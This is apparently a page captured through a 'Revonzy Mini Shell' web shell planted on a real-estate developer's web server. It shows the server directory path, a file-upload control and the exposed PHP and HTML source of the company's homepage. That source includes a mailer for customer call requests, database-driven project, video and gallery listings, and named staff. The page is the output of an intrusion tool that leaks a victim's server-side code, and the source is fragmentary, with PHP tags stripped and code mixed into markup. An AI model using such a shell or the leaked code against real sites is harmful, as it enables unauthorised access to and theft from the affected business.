Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/

	$db		=	new class_functions();
	$flag	=	0;
		$delete_id	=	$_GET['delete_id'];
			$flag	=	3;

	$flag	=	0;
		$user_name 	  		= $_POST['user_name'];
		$user_contact 	  	= $_POST['user_contact'];
		$status 			= "Pending";
			$flag = 1;
			// $customer_name = ""
			// $cust_mobile_no = "";
			//Send Email
			$to		=	"";
			$from	=	"";
			$subject= 	"Customer Call Request From Website-";
			$message 	= 	"
						Dear Sir, <br />
						You received new customer 'Call Request'. Kindly call them and take follow up. <br /><br />
						Customer details given below: <br />
						Name : ".$user_name." <br />
						Mobile No : ".$user_contact." <br />
					// To send HTML mail, the Content-type header must be set
				$headers  = 'MIME-Version: 1.0' . "\r\n";
				$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
				$headers .= 'From:'.$from."\r\n"
				.'Reply-To: $from'."\r\n";
					mail($to,$subject, $message, $headers);
			$flag = 2;


Author: W3layouts
Author URL:
License: Creative Commons Attribution 3.0 Unported
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@media only screen and (max-width: 600px) {
<div class="banner-btm-w3layouts" id="services">
	<div class="container">
	<div class="tittle-agileinfo">
		<h3>Welcome to <span>Yash Developer Ploting Projects</span></h3>
		<div class="about_us">
			<center><strong style="font-size:20px; color:#333333; text-align:center; font-style:italic;">"Yash Developers: Building Your Dreams on Solid Ground"</strong></center>
			<br />
			<p style="margin-top:10px; text-align:left;"><span class="paragraph_show"></span>Welcome to Yash Developers, where your aspirations for the perfect plot of land meet our passion for excellence. Established in 2009, we have rapidly grown into a trusted name in land development and sales, dedicated to providing the finest plots for residential and commercial purposes.
			<p style="margin-top:10px; text-align:left;">
			<strong>Our Journey : </strong> It all began with "Krushna Park, Boramani" – our maiden venture in 2010. This project was more than just a launch; it was a testament to our commitment to quality and customer satisfaction. Since then, our journey has been one of constant growth and enduring relationships.
			<hr />
<p style="margin-top:10px; text-align:left;">
			<strong>Our Promise :</strong> At Yash Developers, we believe in creating more than just land parcels; we aim to create communities and spaces where dreams can flourish. Our team of experienced professionals is committed to ensuring that every square inch of land we sell meets the highest standards of quality and legality.</p>
			<hr />
			<p style="margin-top:10px;text-align:left;">
			<strong>Our Vision :</strong> We envision a future where Yash Developers is synonymous with the best in land development. A future where every project we undertake becomes a benchmark for excellence and a vibrant space for communities to thrive.</p>
			<hr />
			<p style="margin-top:10px;text-align:left;">
			<strong>Join Us :</strong> As we continue to grow and expand our horizons, we invite you to be a part of our journey. Whether you are looking for the perfect plot for your dream home, a strategic location for your business, or a fruitful investment opportunity, Yash Developers is here to turn your aspirations into reality.</p>
		<br /><br />
			<h3 style="">Our Achievements</h3>
			<br />
			<div style="text-align:center !important; width:100%; display:inline-table;">
			<div class="col-md-4 banner-botm-w3ls main_parent_div">
				<h5 class="h5_main_class">
				<div style="color;">
				<span class="val_display">18</span> 
				<br />Projects Completed
				<hr />
				<span class="val_display">80</span> 
				<br />
				Acres Plots Sold
			<div class="col-md-4 banner-botm-w3ls main_parent_div">
				<h5 class="h5_main_class">
				<div style="color;">
				<span class="val_display">16</span> 
				<br />Ongoing Projects
				<hr />
				<span class="val_display">116</span> 
				<br />
				Acres Plot Area
			<div class="col-md-4 banner-botm-w3ls main_parent_div">
				<h5 class="h5_main_class">
				<div style="color;">
				<span class="val_display">5</span> 
				<br />Projects To Launch
				<hr />
				<span class="val_display">64</span> 
				<br />
				Acres Plot Area
			<!--<div class="col-md-3 banner-botm-w3ls" style="border:7px solid #666666; padding:15px;">
				<h5 style="color:orangered; text-shadow:0px 1px #333333; font-size:20px; line-height:30px; margin:0px;">
				<span class="val_display">16</span> <br />Ongoing Projects 
				<hr />
				<span class="val_display">116</span> <br />Acres Plot Area
#our_services .services-main .top-w3ls .banner-botm-w3ls
#our_services .services-main .top-w3ls .banner-botm-w3ls .banner-btm-w3layouts-img
#our_services .services-main .top-w3ls .banner-botm-w3ls .banner-btm-w3layouts-grids
    background-image:url('images/landmain.jpg'); height:180px;
<!--banner bottom-->
<hr />

 <div class="banner-btm-w3layouts" id="our_services" style="background-color:#EFEFEF">
	<div class="container">
	<div class="tittle-agileinfo">
		<h3>Yash Developer <span> Projects</span></h3>
		<!--<p >Suspendisse fringilla pellentesque risus sit amet bibendum.</p>-->

								$data	=	array();
								$data	=	$db->get_all_add_project();
								$counter = 1;
									foreach($data as $record)
										$res_id				=	$record[0];
										$project_name		=	$record[1];
										$project_address	=	$record[2];
										$registration_no	=	$record[3];
										$location			=	$record[4];
										$project_type		=	$record[5];
										$project_current_status	=	$record[6];
										$project_layout		=	$record[7];
										$project_logo		=	$record[8];
										$image1				=	$record[9];
										$image2				=	$record[10];
										$image3				=	$record[11];
										$image4				=	$record[12];
										$image5				=	$record[13];
										$image6				=	$record[14];
										$image7				=	$record[15];
										$image8				=	$record[16];
										$image9				=	$record[17];
										$image10			=	$record[18];
										$video				=	$record[19];
										$no_of_towers		=	$record[20];
										$project_selling_status = $record[21];
										$latitude			=	$record[22];
										$longitude			=	$record[23];
										$added				=	$record[24];
										$project_facilities =   $record[25];
										$description 		=   $record[26];
										$layout_three_d_view=   $record[27];
										$prathmik_layout 	=   $record[28];
										$na_layout 			=   $record[29];
										$final_layout 		=   $record[30];
										$layout_order 		=   $record[31];
										$total_plots 		=   $record[32];
										$date				=	$record[33];
										$time				=	$record[34];
	<!--	<div class="services-main">-->
	<!--	<div class="top-w3ls">-->
	<!--		<div class="col-md-3 banner-botm-w3ls">-->
	<!--			<div class="banner-btm-w3layouts-grids wow fadeInUp animated" data-wow-delay=".5s" style="background-image: url('mis_software7_dts-unts/project/dashboard/Project_images/<?php echo $project_logo; ?>');  background-size: cover; background-position: center; object-fit:fill">-->
	<!--				<p>-->
	<!--				    <a  href="project.php?project_id=<?php echo $res_id; ?>" style="background-color:#FFFFFF; border:1px solid #DFDFDF; border-radius:8px; padding:7px;">View Project Details</a>-->
	<!--				</p>-->
					<!--<div class="banner-btm-w3layouts-img">-->
					<!--	<i class="fa fa-home" aria-hidden="true">	</i>-->
					<!--	<br />-->
					<!--	<span style="color:#000000; font-weight:bold;">-->
					<!--	    <?php echo $project_name ?> <br />-->
					<!--	    <?php echo $project_current_status; ?><br /> <?php echo $location; ?>-->
					<!--	</span>-->
 <!--       			<div class="banner-btm-w3layouts-img" style="background-image: url('mis_software7_dts-unts/project/dashboard/Project_images/<?php echo $project_logo; ?>');  background-size: cover; background-position: center; object-fit:fill">-->
 <!--                       <br />-->
 <!--                       <span style="color:#000000; font-weight:bold;">-->
 <!--                           <?php echo $project_name; ?> <br />-->
 <!--                           <?php echo $project_current_status; ?><br />-->
 <!--                           <?php echo $location; ?>-->
 <!--                       </span>-->
 <!--                   </div>-->
	<!--			</div>-->
				<!--<h5>Homes for sale</h5>-->
	<!--		</div>-->
	<!--	</div>-->
	<div class="services-main">
    <div class="top-w3ls">
        <div class="col-md-3 banner-botm-w3ls">
        <div class="banner-btm-w3layouts-grids wow fadeInUp animated" data-wow-delay=".5s" style="position: relative; background-image: url('mis_software7_dts-unts/project/dashboard/Project_images/<?php echo $project_logo; ?>'); background-size: contain; background-position: center; height: 350px; width: 100%; padding: 25px; display: flex; flex-direction: column; justify-content: flex-end; color: white; font-weight: bold; text-align: center; background-color: white; background-repeat: no-repeat;">
					    <a  href="project.php?project_id=<?php echo $res_id; ?>" style="background-color:#337ab7; border:3px solid white;color:white;font-weight:800; border-radius:8px; padding:7px;">View Details</a>
                <!-- Text Content -->
                <div class="banner-btm-w3layouts-img" style="background-color: rgba(0, 0, 0, 0.5); padding: 15px; border-radius: 8px; box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.2);">
                    <span style="font-size: 18px; line-height: 1.4;">
                        <?php echo $project_name; ?> <br />
                        <?php echo $project_current_status; ?><br />
                        <?php echo $location; ?>
                    <br />
                    <!--    <a href="project.php?project_id=<?php echo $res_id; ?>" style="background-color: #FFFFFF; border: 1px solid #DFDFDF; border-radius: 8px; padding: 7px 15px; color: #000000; font-weight: normal; text-decoration: none; margin-top: 10px;">View Project Details</a>-->


			<div class="col-md-3 banner-botm-w3ls">
				<div class="banner-btm-w3layouts-grids banner-btm-w3layouts-mdl wow fadeInUp animated" data-wow-delay=".5s">
					<p>Lorem ipsum dolor sit amet, consectetur adipi amet bibendum.</p>
					<div class="banner-btm-w3layouts-img">
						<i class="fa fa-building-o" aria-hidden="true"></i>
				<h5>Homes for rent</h5>
			<div class="col-md-3 banner-botm-w3ls">
				<div class="banner-btm-w3layouts-grids banner-btm-w3layouts-mdl1 wow fadeInUp animated" data-wow-delay=".5s">
					<p>Lorem ipsum dolor sit amet, consectetur adipi amet bibendum.</p>
					<div class="banner-btm-w3layouts-img">
						<i class="fa fa-building" aria-hidden="true"></i>
				<h5>Homes for lease</h5>
			<div class="col-md-3 banner-botm-w3ls">
				<div class="banner-btm-w3layouts-grids wow fadeInUp animated" data-wow-delay=".5s">
					<p>Lorem ipsum dolor sit amet, consectetur adipi amet bibendum.</p>
					<div class="banner-btm-w3layouts-img">
						<i class="fa fa-hospital-o" aria-hidden="true"></i>
				<h5>Homes for mortgage</h5>
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			<div class="bottom-w3ls">
			<div class="col-md-3 banner-botm-w3ls">
				<div class="banner-btm-w3layouts-grids wow fadeInUp animated" data-wow-delay=".5s">
					<p>Lorem ipsum dolor sit amet, consectetur adipi amet bibendum.</p>
					<div class="banner-btm-w3layouts-img">
						<i class="fa fa-bar-chart" aria-hidden="true"></i>
				<h5>Finance service</h5>
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				<div class="banner-btm-w3layouts-grids banner-btm-w3layouts-mdl wow fadeInUp animated" data-wow-delay=".5s">
					<p>Lorem ipsum dolor sit amet, consectetur adipi amet bibendum.</p>
					<div class="banner-btm-w3layouts-img">
						<i class="fa fa-users" aria-hidden="true"></i>
				<h5>Matching Buyer</h5>
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					<p>Lorem ipsum dolor sit amet, consectetur adipi amet bibendum.</p>
					<div class="banner-btm-w3layouts-img">
						<i class="fa fa-percent" aria-hidden="true"></i>
				<h5>Price analysis</h5>
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				<div class="banner-btm-w3layouts-grids wow fadeInUp animated" data-wow-delay=".5s">
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					<div class="banner-btm-w3layouts-img">
						<i class="fa fa-money" aria-hidden="true"></i>
				<h5>Make money</h5>
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<div class="container">
    <div class="tittle-agileinfo">
        <h3 style="color:#FFFFFF; font-weight:bold; text-shadow:2px 2px #000000;"> <span>Project Videos</span></h3>
    <div class="services-main">
        <div class="col-lg-12">
            <div class="carousel" style="text-align:center;">
                $groups_data = $db->get_all_project_video_details();
                $counter = 1;
                $first_video = ''; 
                foreach ($groups_data as $record) {
                    $title = $record[1];
                    $description = $record[2];
                    $video_one = $record[3];

                    if (!empty($video_one)) {
                        if ($counter == 1) {
                            $first_video = $video_one; 
                if (!empty($first_video)) {
                        <video id="mainVideo" src="mis_software7_dts-unts/project/dashboard/Project_videos/<?php echo $first_video; ?>" style="height: 300px; width: 100%;" controls autoplay>
                            Your browser does not support the video tag.

                <div class="video-thumbnails">
                    <button class="slider-btn left" onclick="slideLeft()">&#8592;</button>
                    <div class="video-slider">
                        foreach ($groups_data as $record) {
                            $title = $record[1];
                            $description = $record[2];
                            $video_one = $record[3];

                            if (!empty($video_one)) {
                                <a href="javascript:void(0);" onclick="changeVideo('<?php echo $video_one; ?>')">
                                    <video src="mis_software7_dts-unts/project/dashboard/Project_videos/<?php echo $video_one; ?>" style="height: 100px; width: 100%; object-fit: cover; margin: 5px;">
                                        Your browser does not support the video tag.
                                    <p><?php echo $title; ?></p>
                                    <span><?php echo $description; ?></span>
                    <button class="slider-btn right" onclick="slideRight()">&#8594;</button>

function changeVideo(videoId) {
    var mainVideo = document.querySelector('#mainVideo');
    mainVideo.src = "mis_software7_dts-unts/project/dashboard/Project_videos/" + videoId;;

function slideLeft() {
    const slider = document.querySelector('.video-slider');
    slider.scrollLeft -= 160; // Adjust scroll amount as needed

function slideRight() {
    const slider = document.querySelector('.video-slider');
    slider.scrollLeft += 160; // Adjust scroll amount as needed


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    <div class="container">
    <div class="tittle-agileinfo">
        <h3 style="color:#FFFFFF; font-weight:bold; text-shadow:2px 2px #000000;"> <span>Youtube Videos</span></h3>
    <div class="services-main">
        <div class="col-lg-12">
            <div class="carousel" style="text-align:center;">
                $data = $db->get_all_video_src_record();
                $counter = 1;
                $first_video = ''; 
                if (!empty($data)) {
                    foreach ($data as $record) {
                        $res_id = $record[0];
                        $title = $record[1];
                        $description = $record[2];
                        $video_link = $record[3];
                        $date = $record[4];
                        $time = $record[5];

                        if ($counter == 1) {
                            $first_video = $video_link; 
                if (!empty($first_video)) {
                    <!--    <iframe width="100%" height="300" src="<?php echo $first_video; ?>" frameborder="0" allowfullscreen></iframe>-->

                <div class="video-thumbnails">
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                    <div class="video-slider">
                        if (!empty($data)) {
                            foreach ($data as $record) {
                                $title = $record[1];
                                $description = $record[2];
                                $video_link = $record[3];
                               <a class="video-links" >
                                    <div><?php echo $video_link; ?></div><br><br><br>
                                    <!--<iframe width="140" height="100" src="<?php echo $video_link; ?>" frameborder="0" allowfullscreen></iframe>-->
                                    <p><?php echo $title; ?></p>
                                    <span><?php echo $description; ?></span>
                    <button class="slider-btn right" onclick="slideRight()">&#8594;</button>

function changeVideo(videoId) {
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    mainVideo.src = "" + videoId;

function slideLeft() {
    const slider = document.querySelector('.video-slider');
    slider.scrollLeft -= 160; // Adjust scroll amount as needed

function slideRight() {
    const slider = document.querySelector('.video-slider');
    slider.scrollLeft += 160; // Adjust scroll amount as needed

.carousel {
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.slider-btn.right {
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.slider-btn:hover {
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		<h2>About <span>Yash Developers</span></h2>
		<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500 when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap. Lorem Ipsum is simply dummy text of the printing and typesetting industry.</p>
	<div class="container">
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				<h5 style="color:#FFFFFF; font-size:20px;">NATP अंतिम ले-आऊट</h5>
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				<h5 style="color:#FFFFFF; font-size:20px;">स्वतंत्र ७/१२ उता रा (ऑनलाईन)</h5>
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				<h5 style="color:#FFFFFF; font-size:20px;">वास्तु शास्त्राप्रमाणे प्लॉटची रचना</h5>
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				<h5 style="color:#FFFFFF; font-size:20px;">N.A क्लिअर टायटल</h5>
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				<h5 style="color:#FFFFFF; font-size:20px;">बँक लोन ची सुविधा</h5>
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<div class="banner-btm-w3layouts" id="services">
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		<h3>Facilities Available at Our <span>Projects</span></h3>
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				<div class="banner-btm-w3layouts-grids banner-btm-w3layouts-mdl wow fadeInUp animated" data-wow-delay=".5s" style="background-image:url('facilities_img/Play Ground.jpeg'); background-size:100% 100%;height:200px;">
				<h5 style="color:#000; font-size:20px; margin-top:25px;">Play Ground</h5>
			<div class="col-md-4 banner-botm-w3ls">
				<div class="banner-btm-w3layouts-grids banner-btm-w3layouts-mdl wow fadeInUp animated" data-wow-delay=".5s" style="background-image:url('facilities_img/Pipe Line.jpeg'); background-size:100% 100%;height:200px;">
				<h5 style="color:#000; font-size:20px; margin-top:25px;">Pipe Line</h5>
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				<div class="banner-btm-w3layouts-grids banner-btm-w3layouts-mdl wow fadeInUp animated" data-wow-delay=".5s" style="background-image:url('facilities_img/Wall Compound.jpeg'); background-size:100% 100%;height:200px;">
				<h5 style="color:#000; font-size:20px; margin-top:25px;">Wall Compound</h5>
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			<!--	<div class="banner-btm-w3layouts-grids banner-btm-w3layouts-mdl wow fadeInUp animated" data-wow-delay=".5s" style="background-image:url('facilities_img/Wall Compound1.jpeg'); background-size:100% 100%;">-->
			<!--	<h5 style="color:#000000; font-size:20px; margin-top:25px;">Wall Compound</h5>-->
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				<div class="banner-btm-w3layouts-grids banner-btm-w3layouts-mdl wow fadeInUp animated" data-wow-delay=".5s" style="background-image:url('facilities_img/Garden.jpeg'); background-size:100% 100%;height:200px;">
				<h5 style="color:#000; font-size:20px; margin-top:25px;">Garden</h5>
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				<div class="banner-btm-w3layouts-grids banner-btm-w3layouts-mdl wow fadeInUp animated" data-wow-delay=".5s" style="background-image:url('facilities_img/Garden1.jpeg'); background-size:100% 100%;height:200px;">
					<h5 style="color:#000; font-size:20px; margin-top:25px;">Garden</h5>
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				<div class="banner-btm-w3layouts-grids banner-btm-w3layouts-mdl wow fadeInUp animated" data-wow-delay=".5s" style="background-image:url('facilities_img/Street Light.jpeg'); background-size:100% 100%;height:200px;">
				<h5 style="color:#000; font-size:20px; margin-top:25px;">Street Light</h5>
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				<div class="banner-btm-w3layouts-grids banner-btm-w3layouts-mdl wow fadeInUp animated" data-wow-delay=".5s" style="background-image:url('facilities_img/Underground MSEB.jpeg'); background-size:100% 100%;height:200px;">
					<h5 style="color:#000; font-size:20px; margin-top:25px;">Underground MSEB</h5>
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				<div class="banner-btm-w3layouts-grids banner-btm-w3layouts-mdl wow fadeInUp animated" data-wow-delay=".5s" style="background-image:url('facilities_img/Drainage Line.jpeg'); background-size:100% 100%;height:200px;">

            <h5 style="color:#000; font-size:20px; margin-top:25px;">Drainage Line</h5>			</div>
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				<div class="banner-btm-w3layouts-grids banner-btm-w3layouts-mdl wow fadeInUp animated" data-wow-delay=".5s" style="background-image:url('facilities_img/Dambari Raste.jpeg'); background-size:100% 100%; height:150px;height:200px;">
					<h5 style="color:#000; font-size:20px; margin-top:25px;">Dambari Raste</h5>
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				<div class="banner-btm-w3layouts-grids banner-btm-w3layouts-mdl wow fadeInUp animated" data-wow-delay=".5s" style="background-image:url('facilities_img/Dambari Raste2.jpeg'); background-size:100% 100%; height:150px;height:200px;">
					<h5 style="color:#000; font-size:20px; margin-top:25px;">Dambari Raste</h5>
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                <h5 style="color:#000; font-size:20px; margin-top:25px;">Function Hall</h5>			</div>
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					<h5 style="color:#000; font-size:20px; margin-top:25px;">Wall Compound</h5>
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			<h3>property for<span> sale</span></h3>
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			<div class="agile-team-grids">
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						<p><i class="fa fa-home" aria-hidden="true"></i> 450 Sqft</p>
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					<div class="prop-btm-w3ls">
						<h4>Luxury Villa<span>$55,320</span></h4>
						<p><i class="fa fa-map-marker" aria-hidden="true"></i>8901 Marmora Road,Australia</p>
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						<p><i class="fa fa-home" aria-hidden="true"></i> 480 Sqft</p>
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					<div class="prop-btm-w3ls">
						<h4>Luxury Villa<span>$58,390</span></h4>
						<p><i class="fa fa-map-marker" aria-hidden="true"></i>8901 Marmora Road,New Jersey</p>
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						<div class="both-w3-agileits">
						<p><i class="fa fa-home" aria-hidden="true"></i> 500 Sqft</p>
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						<p><i class="fa fa-bed" aria-hidden="true"></i> 4</p>
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						<p><i class="fa fa-wheelchair" aria-hidden="true"></i> 3</p>
						<div class="clearfix"> </div>
					<div class="prop-btm-w3ls">
						<h4>Luxury Villa<span>$60,320</span></h4>
						<p><i class="fa fa-map-marker" aria-hidden="true"></i>8901 Marmora Road,Italy</p>
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										<h5>PROPERTY FOR SALE</h5>
										<div class="prop-btm-w3ls">
											<h4>Luxury Villa<span>$55,320</span></h4>
											<p><i class="fa fa-map-marker" aria-hidden="true"></i>8901 Marmora Road,Australia</p>
										<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting.</p>
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										<h5>PROPERTY FOR SALE</h5>
										<div class="prop-btm-w3ls">
											<h4>Luxury Villa<span>$58,390</span></h4>
											<p><i class="fa fa-map-marker" aria-hidden="true"></i>8901 Marmora Road,New Jersey</p>
										<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting.</p>
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										<h4>Yash Developer Plots</h4>
										<img src="images/g8.jpg" alt=" " class="img-responsive">
										<h5>PROPERTY FOR SALE</h5>
										<div class="prop-btm-w3ls">
											<h4>Luxury Villa<span>$60,320</span></h4>
											<p><i class="fa fa-map-marker" aria-hidden="true"></i>8901 Marmora Road,Italy</p>
										<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting.</p>
<!-- //Modal2 -->

<!-- //property -->
<!-- team -->
	<!--<div class="team" id="team">
		<div class="container">
		<div class="tittle-agileinfo">
			<h3>Our <span>Agents</span></h3>
			<p >Suspendisse fringilla pellentesque risus sit amet bibendum.</p>
						  <div class="inner_w3l_agile_grids">
						<div class="sreen-gallery-cursual">
						       <div id="owl-demo" class="owl-carousel">
							      <div class="item-owl">
					                		<div class="test-review">
						                	  <img src="images/s1.jpg" class="img-responsive" alt=""/>
											  <h5>Nick Anderson</h5>
					                 <div class="item-owl">
					                	<div class="test-review">
						                	  <img src="images/s2.jpg" class="img-responsive" alt=""/>
											  <h6>Sales Agent</h6>
					                 <div class="item-owl">
					                	    <div class="test-review">
						                	  <img src="images/s3.jpg" class="img-responsive" alt=""/>
									 <div class="item-owl">
					                	    <div class="test-review">
						                	  <img src="images/s4.jpg" class="img-responsive" alt=""/>
											  <h5>John Smith</h5>
											  <h6>Area Agent</h6>
									<div class="item-owl">
					                	    <div class="test-review">
						                	  <img src="images/s5.jpg" class="img-responsive" alt=""/>
					                 <div class="item-owl">
					                		<div class="test-review">
						                	  <img src="images/s6.jpg" class="img-responsive" alt=""/>
											  <h6>Sales Manager</h6>
									 <div class="item-owl">
					                		<div class="test-review">
						                	  <img src="images/s1.jpg" class="img-responsive" alt=""/>
											  <h5>Nick Anderson</h5>

				<div class="clearfix"> </div>
<!-- //team -->
<!-- <div class="gallery" id="gallery">-->
<!--	<div class="container">-->
<!--	<div class="tittle-agileinfo">-->
<!--			<h3>Our<span> Gallery</span></h3>-->
<!--			<p >Here are some of our project photos</p>-->
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<!--								<img src="images/project/5.jpg" alt="" />-->
<!--								<figcaption>-->
<!--									<h3><span></span></h3>-->
<!--								</figcaption>	-->
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<!--								<img src="images/project/6.jpg" alt="" />-->
<!--								<figcaption>-->
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<!--								<img src="images/project/7.jpg" alt="" />-->
<!--								<figcaption>-->
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<!--								<img src="images/project/8.jpg" alt="" />-->
<!--								<figcaption>-->
<!--								<h3><span></span></h3>-->
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<!--								<img src="images/project/9.jpg" alt="" />-->
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<!--								<img src="images/project/10.jpg" alt="" />-->
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<!--								<img src="images/project/11.jpg" alt="" />-->
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<!--								<img src="images/project/13.jpg" alt="" />-->
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<!--								<img src="images/2.jpg" alt="" />-->
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<div class="gallery" style="background-color:#333333; background-image:url('images/calendar-image.jpg'); background-size:100% 100%; border:2px solid #ec0b3f; padding:0px !important; ">
    <div class="container">
        <div class="tittle-agileinfo" style="background-color:transparent; margin:0px !important;padding:60px;">
            <h3 style="color:#ff0000; font-weight:bold; text-shadow:4px 4px #FFFFFF;">&#128198; Yash Developer - 2025 Calendar Download &#128198;</h3>
            <a href="pdf/Yash-Developer-Calender-2025.pdf" style="color:red; font-size:22px; font-weight:bold;" target="_blank">&#128065; View Calendar</a> - 
            <a href="pdf/Yash-Developer-Calender-2025.pdf"  style="color:green; font-size:22px; font-weight:bold;"  target="_blank" download> &#x2193; Download Calendar </a>

<div class="gallery" id="gallery">
    <div class="container">
        <div class="tittle-agileinfo">
            <h3>Our <span>Gallery</span></h3>
            <p>Here are some of our project photos</p>

        <!-- Tabs for different galleries -->
        <div class="gallery-tabs">
            <ul class="tab-list">
                <li class="tab-item " data-tab="customer-gallery">Customer Gallery</li>
                <li class="tab-item active" data-tab="site-gallery">Site Gallery</li>
                <li class="tab-item" data-tab="office-gallery">Office Gallery</li>

        <!-- Gallery Content -->
        <div class="tab-content">
            <!-- Customer Gallery -->
            <div class="tab-pane customer-gallery ">
                $report_details = $db->get_team_details();
                if (!empty($report_details)) {
                    $counter = 0;
                    <div class="gallery-row">
                        foreach ($report_details as $record) {
                            $select_subject = $report_details[$counter][6];
                            if ($select_subject == 'gallery') {
                                $team_photo = $report_details[$counter][5];
                                <div class="gallery-grid">
                                    <div class="grid">
                                        <figure class="effect-roxy">
                                            <a class="example-image-link" href="mis_software7_dts-unts/project/dashboard/gallary/<?php echo $team_photo; ?>" data-lightbox="example-set" data-title="Customer Image">
                                                <img src="mis_software7_dts-unts/project/dashboard/gallary/<?php echo $team_photo; ?>" alt="" />
                <?php } ?>

            <!-- Site Gallery -->
            <div class="tab-pane site-gallery active" style="margin-top:50px">
                $report_details = $db->get_team_details();
                if (!empty($report_details)) {
                    $counter = 0;
                    <div class="gallery-row">
                        foreach ($report_details as $record) {
                            $select_subject = $report_details[$counter][6];
                            if ($select_subject == 'site') {
                                $team_photo = $report_details[$counter][5];
                                <div class="gallery-grid" style="background-color:white !important;">
                                    <div class="grid" style="background-color:white !important;">
                                        <figure class="effect-roxy">
                                            <a class="example-image-link" href="mis_software7_dts-unts/project/dashboard/gallary/<?php echo $team_photo; ?>" data-lightbox="example-set" data-title="Site Image">
                                                <img src="mis_software7_dts-unts/project/dashboard/gallary/<?php echo $team_photo; ?>" alt=""  />
                <?php } ?>

            <!-- Office Gallery -->
            <div class="tab-pane office-gallery">
                $report_details = $db->get_team_details();
                if (!empty($report_details)) {
                    $counter = 0;
                    <div class="gallery-row">
                        foreach ($report_details as $record) {
                            $select_subject = $report_details[$counter][6];
                            if ($select_subject == 'office') {
                                $team_photo = $report_details[$counter][5];
                                <div class="gallery-grid">
                                    <div class="grid">
                                        <figure class="effect-roxy">
                                            <a class="example-image-link" href="mis_software7_dts-unts/project/dashboard/gallary/<?php echo $team_photo; ?>" data-lightbox="example-set" data-title="Office Image">
                                                <img src="mis_software7_dts-unts/project/dashboard/gallary/<?php echo $team_photo; ?>" alt="" />
                <?php } ?>

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<!-- testimonials -->
	<div class="testimonials">
		<div class="container">
		<div class="tittle-agileinfo">
			<h3>Some of our<span> happy clients</span></h3>
			<p >Suspendisse fringilla pellentesque risus sit amet bibendum.</p>
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							<div class="agileinfo_team_grid1_pos">
								<img src="images/s1.jpg" alt=" " class="img-responsive" />
							<h4>Mark Henry</h4>
							<h5>Client 1</h5>
							<p>Sed eu sollicitudin ex. Donec malesuada maur ac lectus molestie tristique.</p>
					<div class="col-md-6 agileinfo_team_grid">
					<div class="agileinfo_team_grid1">
						<div class="agileinfo_team_grid1_text">
							<div class="agileinfo_team_grid1_pos">
								<img src="images/s2.jpg" alt=" " class="img-responsive" />
							<h4>John Mark</h4>
							<h5>Client 2</h5>
							<p>Sed eu sollicitudin ex. Donec malesuada maur ac lectus molestie tristique.</p>
						<div class="slide">
							<div class="col-md-6 agileinfo_team_grid">
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						<div class="agileinfo_team_grid1_text">
							<div class="agileinfo_team_grid1_pos">
								<img src="images/s3.jpg" alt=" " class="img-responsive" />
							<h4>Thomus Lii</h4>
							<h5>Client 3</h5>
							<p>Sed eu sollicitudin ex. Donec malesuada maur ac lectus molestie tristique.</p>
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							<h4>Joseph Carl</h4>
							<h5>Client 4</h5>
							<p>Sed eu sollicitudin ex. Donec malesuada maur ac lectus molestie tristique.</p>
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		<h3> Our <span> team</span></h3>
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				<h3>our <span>team</span></h3>
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   <center><h3 style="margin-top:10px" >Yash Developers and Constructions</h3></center> 
    <div class="team-row">
        <div class="member">
            <img src="images/Suyash.jpeg" alt="">
            <h2>Suyash Khanapure</h2>
            <p>Designation : Managing Director</p>
         <div class="member">
            <img src="images/Sonali.jpeg" alt="">
            <h2>Sonali Khanapure</h2>
            <p>Designation : Director</p>
   <center><h3 style="margin-top:10px" >Yash And Yash Build Contra Pvt Ltd</h3></center> 
    <div class="team-row">
        <div class="member">
            <img src="images/Bapusaheb.jpeg" alt="">
            <h2>Bapusaheb Patil</h2>
            <p>Designation : Director</p>
     <div class="team-row">
        <div class="member">
            <img src="images/Sagar.jpeg" alt="">
            <h2>Sagar Lakhapati</h2>
            <p>Designation :  Operational Manager </p>
        <div class="member">
            <img src="images/SUFIYAN MULLA1.jpeg" alt="">
            <h2>Sufiyan Mulla</h2>
            <p>Designation :Chief Engineer</p>
        <div class="member">
            <img src="images/Nikhil1.jpeg" alt="">
            <h2>Nikhil Bayas</h2>   
            <p>Designation : Sales Manager</p>
    <div class="team-row">
        <div class="member">
            <img src="images/Megharaj.jpeg" alt="">
            <h2>Megharaj Tamshetti</h2>
            <p>Designation :  Supervisor </p>
         <div class="member">
            <img src="images/Saipan.jpeg" alt="">
            <h2>Saifan Shaik </h2>
            <p>Designation : Supervisor </p>
          <div class="member">
            <img src="images/Birajdar.jpeg" alt="">
            <h2>Omkar Birajdar </h2>
            <p>Designation : Supervisor </p>
        <div class="member">
            <img src="images/Akash Shinde.jfif" alt="">
            <h2>Akash Shinde</h2>
            <p>Designation : Supervisor</p>
        <div class="member">
            <img src="images/Kamil.jpeg" alt="">
            <h2>Kamil Patel</h2>
            <p>Designation : Supervisor</p>
        <!--<div class="member">-->
        <!--    <img src="images/Prakash Tamshetti.jpeg" alt="">-->
        <!--    <h2>Prakash Tamshetti</h2>-->
        <!--    <p>Designation :  Senior Advisor </p>-->
        <!--<div class="member">-->
        <!--    <img src="images/Sudhir Kumavat1.jpeg" alt="">-->
        <!--    <h2>Sudhir Kumavat</h2>-->
        <!--    <p>Designation :  Senior Advisor</p>-->
        <!--<div class="member">-->
        <!--    <img src="images/Amit Adone Photo.jfif" alt="">-->
        <!--    <h2>Amit Adone</h2>-->
        <!--    <p>Designation :  Senior Advisor </p>-->
        <!--<div class="member">-->
        <!--    <img src="images/Nagesh Paskanti Photo.jfif" alt="">-->
        <!--    <h2>Nagesh Paskanti</h2>-->
